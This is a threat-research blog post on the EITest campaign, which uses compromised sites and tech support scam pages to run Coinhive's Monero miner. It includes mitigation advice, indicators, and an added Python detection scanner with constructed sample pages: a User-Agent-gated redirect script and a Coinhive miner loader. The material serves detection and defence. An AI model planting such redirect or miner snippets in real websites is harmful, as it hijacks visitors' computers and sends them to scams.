
EITest Campaign Uses Tech Support Scams to Deliver Coinhive’s Monero Miner

  • Posted on: September 22, 2017 at 9:01 am
  • Posted in: Bad Sites
  • Author: Joseph C Chen (Fraud Researcher)

We’ve uncovered the notorious EITest campaign delivering a JavaScript (JS) cryptocurrency miner (detected by Trend Micro as HKTL_COINMINE) using tech support scams as a social engineering lure. Tech support scams are fraud operations that impersonate legitimate technical support services and con unwitting victims into paying for these services (or handing over financial data), for instance by scaring them into believing their machine has been infected with malware.

The EITest campaign’s main arsenal is compromised websites. Its activity can be traced back to as early as 2014, and it once used the Angler exploit kit to deliver ransomware. Starting January 2017, it has eschewed exploit kits in favor of “HoeflerText” (a popular font) phishing attacks or tech support scams. In a month, we identified 990 compromised websites injected with a malicious script that diverts the would-be victim to a website related to the tech support scam. Of late, though, the campaign has added the Coinhive JS miner into ongoing attacks, turning the victim’s computer into a Monero cryptocurrency miner. Analysis also revealed that this JS cryptocurrency miner is the same “Coinhive” JS miner found embedded in The Pirate Bay’s website.

Figure 1: Timeline of observed Coinhive-related traffic
Note: We saw that EITest started incorporating cryptocurrency mining on September 19 (highlighted).

Figure 2: Country distribution of EITest’s tech support scam

Attack Chain
When a user accesses one of the compromised websites, the website first identifies the browser type via User-Agent information through the HTTP request. It then injects a phishing script directly into the webpage if the user’s browser is Chrome. Our initial tests show that the attack doesn’t affect Firefox.

The phishing script is coded to notify the user to download the Hoefler Text font to properly display the page, but it actually downloads a malicious executable file. EITest takes this up a notch: If the user’s browser is Internet Explorer, he is redirected to a tech support phishing page containing the Coinhive Monero-mining JS script. Below is a screenshot of the malicious script that diverts the user to a traffic direction system (TDS)—a tool that manages redirection of traffic—which then reroutes the user to the tech support scam website.

Figure 3: Screenshot of the compromised website’s malicious script (Redirect URL of TDS highlighted)

Figure 4: Screenshot of the tech support scam webpage

The tech support scam webpage poses as a legitimate Microsoft Windows notification, alerting victims that the system has been infected with malware. It prods the user to call their “technical department” to resolve the issue. Behind the scenes, however, the webpage loads a script from Coinhive’s server and launches a JS cryptocurrency miner. Users won’t notice that their system has been affected apart from system lags or performance issues.
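As an added example (not code from the original post or from Trend Micro), here is a small static scanner for the two page-side artifacts described in this attack chain: a script that fingerprints the browser through the User-Agent and redirects, and a landing page that loads the Coinhive library and starts the miner. The sample pages and the tds.example hostname are constructed; the coinhive.com script path and the CoinHive.Anonymous API are the publicly documented Coinhive loader, which the post itself does not quote.

```python
import re
from html.parser import HTMLParser
# Constructed sample of a compromised page: it fingerprints the browser via the
# User-Agent and redirects; tds.example is a placeholder, not a real indicator.
COMPROMISED_PAGE = """<html><body><p>Welcome</p><script>
var ua = navigator.userAgent; if (ua.indexOf("Trident") > -1) { window.location.replace("http://tds.example/go"); }
</script></body></html>"""

# Constructed sample of a scam landing page that loads and starts the Coinhive miner.
SCAM_PAGE = """<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER'); m.start();</script>
</head><body><h1>Windows Security Alert</h1></body></html>"""

MINER_HOST = re.compile(r"^https?://(?:[\w-]+\.)*coinhive\.com/", re.I)
MINER_API = re.compile(r"\bCoinHive\.(?:Anonymous|User)\b")
UA_CHECK = re.compile(r"navigator\.userAgent|Trident|MSIE|Chrome/", re.I)
REDIRECT = re.compile(r"location(?:\.href|\.replace|\.assign)?\s*[=(]")

class ScriptCollector(HTMLParser):
    """Collects external script URLs and the body of each inline script."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._buf = []          # start capturing an inline script body
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

def scan_page(html):
    """Return the set of finding labels raised for one HTML document."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = set()
    if any(MINER_HOST.match(s) for s in parser.srcs):
        findings.add("coinhive_script_src")
    for body in parser.inline:
        if MINER_API.search(body):
            findings.add("coinhive_api_call")
        if UA_CHECK.search(body) and REDIRECT.search(body):
            findings.add("ua_gated_redirect")
    return findings
```

Running scan_page over crawled or proxied HTML flags the compromised page as "ua_gated_redirect" and the landing page as both "coinhive_script_src" and "coinhive_api_call"; a page with only first-party scripts returns an empty set.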


Figure 5: How Coinhive’s JS cryptocurrency miner is injected (left), and how it affects the user’s system (right)

Indeed, cybercriminal cryptocurrency mining is gaining traction because it’s an apparent non-zero-sum game. Bad guys can profit even if they don’t invest much in creating their own malware—they can just misuse existing grayware. It also gives them the pseudonymity to keep law enforcement away from their activities.

For end users, however, the impact isn’t just about system wear-and-tear or performance issues. From January 1 to June 24, for instance, our sensors noted that 20% of cryptocurrency-mining activities entailed web- and network-based attacks. From cross-site scripting and remote code execution to brute force attacks and SQL injection, intrusive and malicious cryptocurrency mining can threaten the availability and security of a network or system, and the data stored on them. Worse, victims become part of the problem.

Follow best practices to mitigate cryptocurrency-mining-related attacks. Regularly update and patch your system (including your browsers) and be more prudent against socially engineered attack vectors such as suspicious websites and email attachments. You can consider using JS-blocking applications to prevent scripts like Coinhive’s from running. There’s also a silver lining. Given the nature of Coinhive’s Monero-mining script, it has no persistence mechanism—closing the website/browser will stop the script from running.

Trend Micro Solutions
Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security protect end users and businesses from these threats by detecting and blocking malicious files and all related URLs. Trend Micro™ Smart Protection Suites deliver several capabilities like high fidelity machine learning, web reputation services, behavior monitoring and application control that minimize the impact of this threat.


Indicators of Compromise:
Domains and IP address related to the TDS Server:

  • mackenzie190912[.]gq
  • mackenzie19091[.]gq
  • 162[.]244[.]35[.]210

Domain and IP addresses related to the tech support scam:

  • angel200911[.]ml
  • 162[.]244[.]35[.]35
  • 162[.]244[.]35[.]36

With additional insights/analysis from Samuel P. Wang

Tags: cryptocurrency, cryptocurrency miner, EITest, Tech Support Scam
